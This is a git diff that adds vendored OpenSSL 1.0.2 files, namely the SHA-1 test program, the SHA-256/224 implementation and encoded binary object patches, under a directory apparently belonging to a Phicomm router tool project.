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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha1test.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha1test.c
new file mode 100644
index 0000000..0052a95
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha1test.c
@@ -0,0 +1,174 @@
+/* crypto/sha/sha1test.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+
+#include "../e_os.h"
+
+#ifdef OPENSSL_NO_SHA
+int main(int argc, char *argv[])
+{
+    printf("No SHA support\n");
+    return (0);
+}
+#else
+# include <openssl/evp.h>
+# include <openssl/sha.h>
+
+# ifdef CHARSET_EBCDIC
+#  include <openssl/ebcdic.h>
+# endif
+
+# undef SHA_0                   /* FIPS 180 */
+# define  SHA_1                 /* FIPS 180-1 */
+
+static char *test[] = {
+    "abc",
+    "abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq",
+    NULL,
+};
+
+# ifdef SHA_0
+static char *ret[] = {
+    "0164b8a914cd2a5e74c4f7ff082c4d97f1edf880",
+    "d2516ee1acfa5baf33dfc1c471e438449ef134c8",
+};
+
+static char *bigret = "3232affa48628a26653b5aaa44541fd90d690603";
+# endif
+# ifdef SHA_1
+static char *ret[] = {
+    "a9993e364706816aba3e25717850c26c9cd0d89d",
+    "84983e441c3bd26ebaae4aa1f95129e5e54670f1",
+};
+
+static char *bigret = "34aa973cd4c4daa4f61eeb2bdbad27316534016f";
+# endif
+
+static char *pt(unsigned char *md);
+int main(int argc, char *argv[])
+{
+    int i, err = 0;
+    char **P, **R;
+    static unsigned char buf[1000];
+    char *p, *r;
+    EVP_MD_CTX c;
+    unsigned char md[SHA_DIGEST_LENGTH];
+
+# ifdef CHARSET_EBCDIC
+    ebcdic2ascii(test[0], test[0], strlen(test[0]));
+    ebcdic2ascii(test[1], test[1], strlen(test[1]));
+# endif
+
+    EVP_MD_CTX_init(&c);
+    P = test;
+    R = ret;
+    i = 1;
+    while (*P != NULL) {
+        EVP_Digest(*P, strlen((char *)*P), md, NULL, EVP_sha1(), NULL);
+        p = pt(md);
+        if (strcmp(p, (char *)*R) != 0) {
+            printf("error calculating SHA1 on '%s'\n", *P);
+            printf("got %s instead of %s\n", p, *R);
+            err++;
+        } else
+            printf("test %d ok\n", i);
+        i++;
+        R++;
+        P++;
+    }
+
+    memset(buf, 'a', 1000);
+# ifdef CHARSET_EBCDIC
+    ebcdic2ascii(buf, buf, 1000);
+# endif                         /* CHARSET_EBCDIC */
+    EVP_DigestInit_ex(&c, EVP_sha1(), NULL);
+    for (i = 0; i < 1000; i++)
+        EVP_DigestUpdate(&c, buf, 1000);
+    EVP_DigestFinal_ex(&c, md, NULL);
+    p = pt(md);
+
+    r = bigret;
+    if (strcmp(p, r) != 0) {
+        printf("error calculating SHA1 on 'a' * 1000\n");
+        printf("got %s instead of %s\n", p, r);
+        err++;
+    } else
+        printf("test 3 ok\n");
+
+# ifdef OPENSSL_SYS_NETWARE
+    if (err)
+        printf("ERROR: %d\n", err);
+# endif
+    EXIT(err);
+    EVP_MD_CTX_cleanup(&c);
+    return (0);
+}
+
+static char *pt(unsigned char *md)
+{
+    int i;
+    static char buf[80];
+
+    for (i = 0; i < SHA_DIGEST_LENGTH; i++)
+        sprintf(&(buf[i * 2]), "%02x", md[i]);
+    return (buf);
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha256.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha256.c
new file mode 100644
index 0000000..72a1159
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha256.c
@@ -0,0 +1,387 @@
+/* crypto/sha/sha256.c */
+/* ====================================================================
+ * Copyright (c) 2004 The OpenSSL Project.  All rights reserved
+ * according to the OpenSSL license [found in ../../LICENSE].
+ * ====================================================================
+ */
+#include <openssl/opensslconf.h>
+#if !defined(OPENSSL_NO_SHA) && !defined(OPENSSL_NO_SHA256)
+
+# include <stdlib.h>
+# include <string.h>
+
+# include <openssl/crypto.h>
+# include <openssl/sha.h>
+# include <openssl/opensslv.h>
+
+const char SHA256_version[] = "SHA-256" OPENSSL_VERSION_PTEXT;
+
+fips_md_init_ctx(SHA224, SHA256)
+{
+    memset(c, 0, sizeof(*c));
+    c->h[0] = 0xc1059ed8UL;
+    c->h[1] = 0x367cd507UL;
+    c->h[2] = 0x3070dd17UL;
+    c->h[3] = 0xf70e5939UL;
+    c->h[4] = 0xffc00b31UL;
+    c->h[5] = 0x68581511UL;
+    c->h[6] = 0x64f98fa7UL;
+    c->h[7] = 0xbefa4fa4UL;
+    c->md_len = SHA224_DIGEST_LENGTH;
+    return 1;
+}
+
+fips_md_init(SHA256)
+{
+    memset(c, 0, sizeof(*c));
+    c->h[0] = 0x6a09e667UL;
+    c->h[1] = 0xbb67ae85UL;
+    c->h[2] = 0x3c6ef372UL;
+    c->h[3] = 0xa54ff53aUL;
+    c->h[4] = 0x510e527fUL;
+    c->h[5] = 0x9b05688cUL;
+    c->h[6] = 0x1f83d9abUL;
+    c->h[7] = 0x5be0cd19UL;
+    c->md_len = SHA256_DIGEST_LENGTH;
+    return 1;
+}
+
+unsigned char *SHA224(const unsigned char *d, size_t n, unsigned char *md)
+{
+    SHA256_CTX c;
+    static unsigned char m[SHA224_DIGEST_LENGTH];
+
+    if (md == NULL)
+        md = m;
+    SHA224_Init(&c);
+    SHA256_Update(&c, d, n);
+    SHA256_Final(md, &c);
+    OPENSSL_cleanse(&c, sizeof(c));
+    return (md);
+}
+
+unsigned char *SHA256(const unsigned char *d, size_t n, unsigned char *md)
+{
+    SHA256_CTX c;
+    static unsigned char m[SHA256_DIGEST_LENGTH];
+
+    if (md == NULL)
+        md = m;
+    SHA256_Init(&c);
+    SHA256_Update(&c, d, n);
+    SHA256_Final(md, &c);
+    OPENSSL_cleanse(&c, sizeof(c));
+    return (md);
+}
+
+int SHA224_Update(SHA256_CTX *c, const void *data, size_t len)
+{
+    return SHA256_Update(c, data, len);
+}
+
+int SHA224_Final(unsigned char *md, SHA256_CTX *c)
+{
+    return SHA256_Final(md, c);
+}
+
+# define DATA_ORDER_IS_BIG_ENDIAN
+
+# define HASH_LONG               SHA_LONG
+# define HASH_CTX                SHA256_CTX
+# define HASH_CBLOCK             SHA_CBLOCK
+/*
+ * Note that FIPS180-2 discusses "Truncation of the Hash Function Output."
+ * default: case below covers for it. It's not clear however if it's
+ * permitted to truncate to amount of bytes not divisible by 4. I bet not,
+ * but if it is, then default: case shall be extended. For reference.
+ * Idea behind separate cases for pre-defined lenghts is to let the
+ * compiler decide if it's appropriate to unroll small loops.
+ */
+# define HASH_MAKE_STRING(c,s)   do {    \
+        unsigned long ll;               \
+        unsigned int  nn;               \
+        switch ((c)->md_len)            \
+        {   case SHA224_DIGEST_LENGTH:  \
+                for (nn=0;nn<SHA224_DIGEST_LENGTH/4;nn++)       \
+                {   ll=(c)->h[nn]; (void)HOST_l2c(ll,(s));   }  \
+                break;                  \
+            case SHA256_DIGEST_LENGTH:  \
+                for (nn=0;nn<SHA256_DIGEST_LENGTH/4;nn++)       \
+                {   ll=(c)->h[nn]; (void)HOST_l2c(ll,(s));   }  \
+                break;                  \
+            default:                    \
+                if ((c)->md_len > SHA256_DIGEST_LENGTH) \
+                    return 0;                           \
+                for (nn=0;nn<(c)->md_len/4;nn++)                \
+                {   ll=(c)->h[nn]; (void)HOST_l2c(ll,(s));   }  \
+                break;                  \
+        }                               \
+        } while (0)
+
+# define HASH_UPDATE             SHA256_Update
+# define HASH_TRANSFORM          SHA256_Transform
+# define HASH_FINAL              SHA256_Final
+# define HASH_BLOCK_DATA_ORDER   sha256_block_data_order
+# ifndef SHA256_ASM
+static
+# endif
+void sha256_block_data_order(SHA256_CTX *ctx, const void *in, size_t num);
+
+# include "md32_common.h"
+
+# ifndef SHA256_ASM
+static const SHA_LONG K256[64] = {
+    0x428a2f98UL, 0x71374491UL, 0xb5c0fbcfUL, 0xe9b5dba5UL,
+    0x3956c25bUL, 0x59f111f1UL, 0x923f82a4UL, 0xab1c5ed5UL,
+    0xd807aa98UL, 0x12835b01UL, 0x243185beUL, 0x550c7dc3UL,
+    0x72be5d74UL, 0x80deb1feUL, 0x9bdc06a7UL, 0xc19bf174UL,
+    0xe49b69c1UL, 0xefbe4786UL, 0x0fc19dc6UL, 0x240ca1ccUL,
+    0x2de92c6fUL, 0x4a7484aaUL, 0x5cb0a9dcUL, 0x76f988daUL,
+    0x983e5152UL, 0xa831c66dUL, 0xb00327c8UL, 0xbf597fc7UL,
+    0xc6e00bf3UL, 0xd5a79147UL, 0x06ca6351UL, 0x14292967UL,
+    0x27b70a85UL, 0x2e1b2138UL, 0x4d2c6dfcUL, 0x53380d13UL,
+    0x650a7354UL, 0x766a0abbUL, 0x81c2c92eUL, 0x92722c85UL,
+    0xa2bfe8a1UL, 0xa81a664bUL, 0xc24b8b70UL, 0xc76c51a3UL,
+    0xd192e819UL, 0xd6990624UL, 0xf40e3585UL, 0x106aa070UL,
+    0x19a4c116UL, 0x1e376c08UL, 0x2748774cUL, 0x34b0bcb5UL,
+    0x391c0cb3UL, 0x4ed8aa4aUL, 0x5b9cca4fUL, 0x682e6ff3UL,
+    0x748f82eeUL, 0x78a5636fUL, 0x84c87814UL, 0x8cc70208UL,
+    0x90befffaUL, 0xa4506cebUL, 0xbef9a3f7UL, 0xc67178f2UL
+};
+
+/*
+ * FIPS specification refers to right rotations, while our ROTATE macro
+ * is left one. This is why you might notice that rotation coefficients
+ * differ from those observed in FIPS document by 32-N...
+ */
+#  define Sigma0(x)       (ROTATE((x),30) ^ ROTATE((x),19) ^ ROTATE((x),10))
+#  define Sigma1(x)       (ROTATE((x),26) ^ ROTATE((x),21) ^ ROTATE((x),7))
+#  define sigma0(x)       (ROTATE((x),25) ^ ROTATE((x),14) ^ ((x)>>3))
+#  define sigma1(x)       (ROTATE((x),15) ^ ROTATE((x),13) ^ ((x)>>10))
+
+#  define Ch(x,y,z)       (((x) & (y)) ^ ((~(x)) & (z)))
+#  define Maj(x,y,z)      (((x) & (y)) ^ ((x) & (z)) ^ ((y) & (z)))
+
+#  ifdef OPENSSL_SMALL_FOOTPRINT
+
+static void sha256_block_data_order(SHA256_CTX *ctx, const void *in,
+                                    size_t num)
+{
+    unsigned MD32_REG_T a, b, c, d, e, f, g, h, s0, s1, T1, T2;
+    SHA_LONG X[16], l;
+    int i;
+    const unsigned char *data = in;
+
+    while (num--) {
+
+        a = ctx->h[0];
+        b = ctx->h[1];
+        c = ctx->h[2];
+        d = ctx->h[3];
+        e = ctx->h[4];
+        f = ctx->h[5];
+        g = ctx->h[6];
+        h = ctx->h[7];
+
+        for (i = 0; i < 16; i++) {
+            HOST_c2l(data, l);
+            T1 = X[i] = l;
+            T1 += h + Sigma1(e) + Ch(e, f, g) + K256[i];
+            T2 = Sigma0(a) + Maj(a, b, c);
+            h = g;
+            g = f;
+            f = e;
+            e = d + T1;
+            d = c;
+            c = b;
+            b = a;
+            a = T1 + T2;
+        }
+
+        for (; i < 64; i++) {
+            s0 = X[(i + 1) & 0x0f];
+            s0 = sigma0(s0);
+            s1 = X[(i + 14) & 0x0f];
+            s1 = sigma1(s1);
+
+            T1 = X[i & 0xf] += s0 + s1 + X[(i + 9) & 0xf];
+            T1 += h + Sigma1(e) + Ch(e, f, g) + K256[i];
+            T2 = Sigma0(a) + Maj(a, b, c);
+            h = g;
+            g = f;
+            f = e;
+            e = d + T1;
+            d = c;
+            c = b;
+            b = a;
+            a = T1 + T2;
+        }
+
+        ctx->h[0] += a;
+        ctx->h[1] += b;
+        ctx->h[2] += c;
+        ctx->h[3] += d;
+        ctx->h[4] += e;
+        ctx->h[5] += f;
+        ctx->h[6] += g;
+        ctx->h[7] += h;
+
+    }
+}
+
+#  else
+
+#   define ROUND_00_15(i,a,b,c,d,e,f,g,h)          do {    \
+        T1 += h + Sigma1(e) + Ch(e,f,g) + K256[i];      \
+        h = Sigma0(a) + Maj(a,b,c);                     \
+        d += T1;        h += T1;                } while (0)
+
+#   define ROUND_16_63(i,a,b,c,d,e,f,g,h,X)        do {    \
+        s0 = X[(i+1)&0x0f];     s0 = sigma0(s0);        \
+        s1 = X[(i+14)&0x0f];    s1 = sigma1(s1);        \
+        T1 = X[(i)&0x0f] += s0 + s1 + X[(i+9)&0x0f];    \
+        ROUND_00_15(i,a,b,c,d,e,f,g,h);         } while (0)
+
+static void sha256_block_data_order(SHA256_CTX *ctx, const void *in,
+                                    size_t num)
+{
+    unsigned MD32_REG_T a, b, c, d, e, f, g, h, s0, s1, T1;
+    SHA_LONG X[16];
+    int i;
+    const unsigned char *data = in;
+    const union {
+        long one;
+        char little;
+    } is_endian = {
+        1
+    };
+
+    while (num--) {
+
+        a = ctx->h[0];
+        b = ctx->h[1];
+        c = ctx->h[2];
+        d = ctx->h[3];
+        e = ctx->h[4];
+        f = ctx->h[5];
+        g = ctx->h[6];
+        h = ctx->h[7];
+
+        if (!is_endian.little && sizeof(SHA_LONG) == 4
+            && ((size_t)in % 4) == 0) {
+            const SHA_LONG *W = (const SHA_LONG *)data;
+
+            T1 = X[0] = W[0];
+            ROUND_00_15(0, a, b, c, d, e, f, g, h);
+            T1 = X[1] = W[1];
+            ROUND_00_15(1, h, a, b, c, d, e, f, g);
+            T1 = X[2] = W[2];
+            ROUND_00_15(2, g, h, a, b, c, d, e, f);
+            T1 = X[3] = W[3];
+            ROUND_00_15(3, f, g, h, a, b, c, d, e);
+            T1 = X[4] = W[4];
+            ROUND_00_15(4, e, f, g, h, a, b, c, d);
+            T1 = X[5] = W[5];
+            ROUND_00_15(5, d, e, f, g, h, a, b, c);
+            T1 = X[6] = W[6];
+            ROUND_00_15(6, c, d, e, f, g, h, a, b);
+            T1 = X[7] = W[7];
+            ROUND_00_15(7, b, c, d, e, f, g, h, a);
+            T1 = X[8] = W[8];
+            ROUND_00_15(8, a, b, c, d, e, f, g, h);
+            T1 = X[9] = W[9];
+            ROUND_00_15(9, h, a, b, c, d, e, f, g);
+            T1 = X[10] = W[10];
+            ROUND_00_15(10, g, h, a, b, c, d, e, f);
+            T1 = X[11] = W[11];
+            ROUND_00_15(11, f, g, h, a, b, c, d, e);
+            T1 = X[12] = W[12];
+            ROUND_00_15(12, e, f, g, h, a, b, c, d);
+            T1 = X[13] = W[13];
+            ROUND_00_15(13, d, e, f, g, h, a, b, c);
+            T1 = X[14] = W[14];
+            ROUND_00_15(14, c, d, e, f, g, h, a, b);
+            T1 = X[15] = W[15];
+            ROUND_00_15(15, b, c, d, e, f, g, h, a);
+
+            data += SHA256_CBLOCK;
+        } else {
+            SHA_LONG l;
+
+            HOST_c2l(data, l);
+            T1 = X[0] = l;
+            ROUND_00_15(0, a, b, c, d, e, f, g, h);
+            HOST_c2l(data, l);
+            T1 = X[1] = l;
+            ROUND_00_15(1, h, a, b, c, d, e, f, g);
+            HOST_c2l(data, l);
+            T1 = X[2] = l;
+            ROUND_00_15(2, g, h, a, b, c, d, e, f);
+            HOST_c2l(data, l);
+            T1 = X[3] = l;
+            ROUND_00_15(3, f, g, h, a, b, c, d, e);
+            HOST_c2l(data, l);
+            T1 = X[4] = l;
+            ROUND_00_15(4, e, f, g, h, a, b, c, d);
+            HOST_c2l(data, l);
+            T1 = X[5] = l;
+            ROUND_00_15(5, d, e, f, g, h, a, b, c);
+            HOST_c2l(data, l);
+            T1 = X[6] = l;
+            ROUND_00_15(6, c, d, e, f, g, h, a, b);
+            HOST_c2l(data, l);
+            T1 = X[7] = l;
+            ROUND_00_15(7, b, c, d, e, f, g, h, a);
+            HOST_c2l(data, l);
+            T1 = X[8] = l;
+            ROUND_00_15(8, a, b, c, d, e, f, g, h);
+            HOST_c2l(data, l);
+            T1 = X[9] = l;
+            ROUND_00_15(9, h, a, b, c, d, e, f, g);
+            HOST_c2l(data, l);
+            T1 = X[10] = l;
+            ROUND_00_15(10, g, h, a, b, c, d, e, f);
+            HOST_c2l(data, l);
+            T1 = X[11] = l;
+            ROUND_00_15(11, f, g, h, a, b, c, d, e);
+            HOST_c2l(data, l);
+            T1 = X[12] = l;
+            ROUND_00_15(12, e, f, g, h, a, b, c, d);
+            HOST_c2l(data, l);
+            T1 = X[13] = l;
+            ROUND_00_15(13, d, e, f, g, h, a, b, c);
+            HOST_c2l(data, l);
+            T1 = X[14] = l;
+            ROUND_00_15(14, c, d, e, f, g, h, a, b);
+            HOST_c2l(data, l);
+            T1 = X[15] = l;
+            ROUND_00_15(15, b, c, d, e, f, g, h, a);
+        }
+
+        for (i = 16; i < 64; i += 8) {
+            ROUND_16_63(i + 0, a, b, c, d, e, f, g, h, X);
+            ROUND_16_63(i + 1, h, a, b, c, d, e, f, g, X);
+            ROUND_16_63(i + 2, g, h, a, b, c, d, e, f, X);
+            ROUND_16_63(i + 3, f, g, h, a, b, c, d, e, X);
+            ROUND_16_63(i + 4, e, f, g, h, a, b, c, d, X);
+            ROUND_16_63(i + 5, d, e, f, g, h, a, b, c, X);
+            ROUND_16_63(i + 6, c, d, e, f, g, h, a, b, X);
+            ROUND_16_63(i + 7, b, c, d, e, f, g, h, a, X);
+        }
+
+        ctx->h[0] += a;
+        ctx->h[1] += b;
+        ctx->h[2] += c;
+        ctx->h[3] += d;
+        ctx->h[4] += e;
+        ctx->h[5] += f;
+        ctx->h[6] += g;
+        ctx->h[7] += h;
+
+    }
+}
+
+#  endif
+# endif                         /* SHA256_ASM */
+
+#endif                          /* OPENSSL_NO_SHA256 */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha256.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha256.o
new file mode 100644
index 0000000000000000000000000000000000000000..560eb4e270f5083e336ae7d6fdf98b5b9210b301
GIT binary patch
literal 8368
zcmd5=dvH`$n!h(4k{FWisL_dIX14Fr4nZ;IfDce+%n9cv7wH8w!Nmg2AOu?tfeFoH
zR>oHoi?dCyjO8D0$?ob5mabA$ZtYr&tHtz92%V5*k^nKhBKSZO0z^bA1c=$+cOTI9
z;M8vIKYOaW&v(B2o$vj9=iK|89xP8&RmB~u@(bn4%Ec;5$xp7pr50GKc$Hj*|1E!*
z&*xS1D~%UUZpQ;d&IlN?Dp0!Ah^F6CWMMW0-oeb`##k^=YDCrtO2>Q~GJGJ8rU#-o
zMitrZYn8!3NQyv?g)2=57_h-CfJHW#18{~7<^e3Qz^Xt&v^3w`Jsz0J_QL{z(`>L1
z;DRV<&6W(-6$P=`m}vnEL~KLaYj^y889g2Dnt(0zctTZRa&&zlhjoeQ!&xF44g`2C
zUjb2$*_kV%<>~6~XfP0%5DXM?-)^%djr&>zq|`?1a@cv=Dy%;^VWqD_)&|06BHMZp
zn7TetG=X?`stGWhq4tVcPM(n1zgx&ws0cHLyTN)gYXsViXR<~RPAiLTP<|`!`IR6w
zR6-R9t%bG75w%NRFk92i-MMVH91*Z0V4B&CRLq$QHMJ4JOtl-96{%*dFiq~~a=$zX
zQQT}9KfDL#7H}4q`ymT6I8TPKyv~d94+J*la5WA^wEbMWz`CHN8t2e!cN%u*>aoHM
zPFS-s8#9r!3)*hM_UQ7UP#bj!gFzt8uyxj%jf-ajg8Pf!I`qMSfIg$T+Bn<=&9n~K
zr9&K4>e5x9_K=5R9%qfR%Zx)%qdd=Av@X^kt;-W?S4Av86Kd&lpDw$69o%fUOoQXs
z>Fg-b+}sIyNA=j&Nedevo-Ug!VmW@$>hiGJk;{j>bZsBk_UmjXmvJbYrmO8-whGp4
zt>f7Qv2NJSHIr*yI&0x-e_3qu#OSm6x_Xq$0WMG4a$CpyI_3JndYye{;YjjlBDVFu
zGuNJZL=MVc@E+c)%Wjt7+JMjw2`wR5n=VbEexb{q9I*taT=js?+JWT=CLk`mNj4ja
zK3kxxVBOBu1G0@|`Z~?F@$%!q^C&UFzMx027ZB{dZ|jTqzrtmkOmOuuAKohm1xsjc
zy0%wnotzyKvP~zk?Pi-LRj3C!I}EJZ1V0~^O+ss87o*P>LOCw?3H1<{du^fImbw8_
zb&~3MnWWy^^H||~2%L}!oy6{e23*_AwG%o!$mJnj{hZ6gU|`AA*<s)~BnsAvg)W=4
